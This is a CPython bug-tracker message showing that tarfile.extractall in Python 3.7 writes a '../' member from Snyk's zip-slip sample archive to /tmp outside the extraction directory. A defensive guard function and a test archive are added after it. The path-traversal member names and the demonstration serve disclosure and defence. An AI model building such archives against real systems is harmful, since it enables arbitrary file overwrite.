Message 334920
You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable.
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip
$ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar
$ mkdir /tmp/zipslip
$ cd /tmp/zipslip
Test zipfile:
$ python3
>>> import zipfile
>>> zf = zipfile.ZipFile('zip-slip.zip')
>>> zf.printdir()
File Name Modified Size
good.txt 2018-04-15 22:04:30 19
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42 20
>>> zf.extractall()
>>> exit()
$ find
.
./tmp
./tmp/evil.txt
./good.txt
./zip-slip.tar
./zip-slip.zip
Test tarfile:
$ rm -rf good.txt tmp/
$ python3
>>> import tarfile
>>> import tarfile
>>> tf = tarfile.TarFile('zip-slip.tar')
>>> tf.list()
?rw-r--r-- grander/staff 19 2018-04-15 19:04:29 good.txt
?rw-r--r-- grander/staff 20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
>>> tf.extractall()
# find
.
./zip-slip.tar
./good.txt
./zip-slip.zip
# cat /tmp/evil.txt
this is an evil one

Date | User | Action | Args
2019-02-06 10:32:49 | christian.heimes | set | recipients: + christian.heimes, SilentGhost, jeffknupp, push0ebp, uhei3nn9
2019-02-06 10:32:47 | christian.heimes | set | messageid: <1549449167.79.0.248348545426.issue35909@roundup.psfhosted.org>
2019-02-06 10:32:47 | christian.heimes | link | issue35909 messages
2019-02-06 10:32:47 | christian.heimes | create |
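As an added example (not part of this tracker message and not CPython code), a defender-side check that refuses tar members whose resolved path, or whose link target, lands outside the destination directory, which is exactly how the `../` member above escaped. The archive is constructed in memory to mimic zip-slip.tar, and `/tmp/zipslip` is only an assumed destination.

```python
import io
import os
import tarfile


def is_within(base: str, target: str) -> bool:
    """True if `target` resolves (after '..' and symlink normalisation) to a path inside `base`."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def unsafe_members(tar: tarfile.TarFile, dest: str) -> list:
    """Return the names of members that would escape `dest` if extracted."""
    bad = []
    for m in tar.getmembers():
        # Absolute names and '..' components both resolve outside dest after realpath().
        if not is_within(dest, os.path.join(dest, m.name)):
            bad.append(m.name)
        # A link with a harmless name can still point outside dest through its target.
        elif m.issym() or m.islnk():
            # Hardlink targets are archive-relative; symlink targets are relative to the member's directory.
            link = m.linkname if m.islnk() else os.path.join(os.path.dirname(m.name), m.linkname)
            if not is_within(dest, os.path.join(dest, link)):
                bad.append(m.name)
    return bad


def safe_extractall(tar: tarfile.TarFile, dest: str) -> None:
    """Extract only when every member stays inside dest; refuse the whole archive otherwise."""
    bad = unsafe_members(tar, dest)
    if bad:
        raise ValueError(f"refusing to extract, {len(bad)} member(s) escape {dest}: {bad}")
    tar.extractall(dest)


def build_test_tar() -> io.BytesIO:
    """Constructed sample: one benign member and one '../' member, like zip-slip.tar."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in (("good.txt", b"this is a good one\n"),
                           ("../../tmp/evil.txt", b"this is an evil one\n")):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


def demo(dest: str = "/tmp/zipslip") -> list:
    """Report which members of the constructed archive would escape the assumed destination."""
    with tarfile.open(fileobj=build_test_tar()) as tar:
        return unsafe_members(tar, dest)
```

Python 3.12 (and the security backports to 3.8.17, 3.9.17, 3.10.12 and 3.11.4) adds a `filter` argument, so `tar.extractall(dest, filter="data")` performs equivalent checks without a hand-written guard.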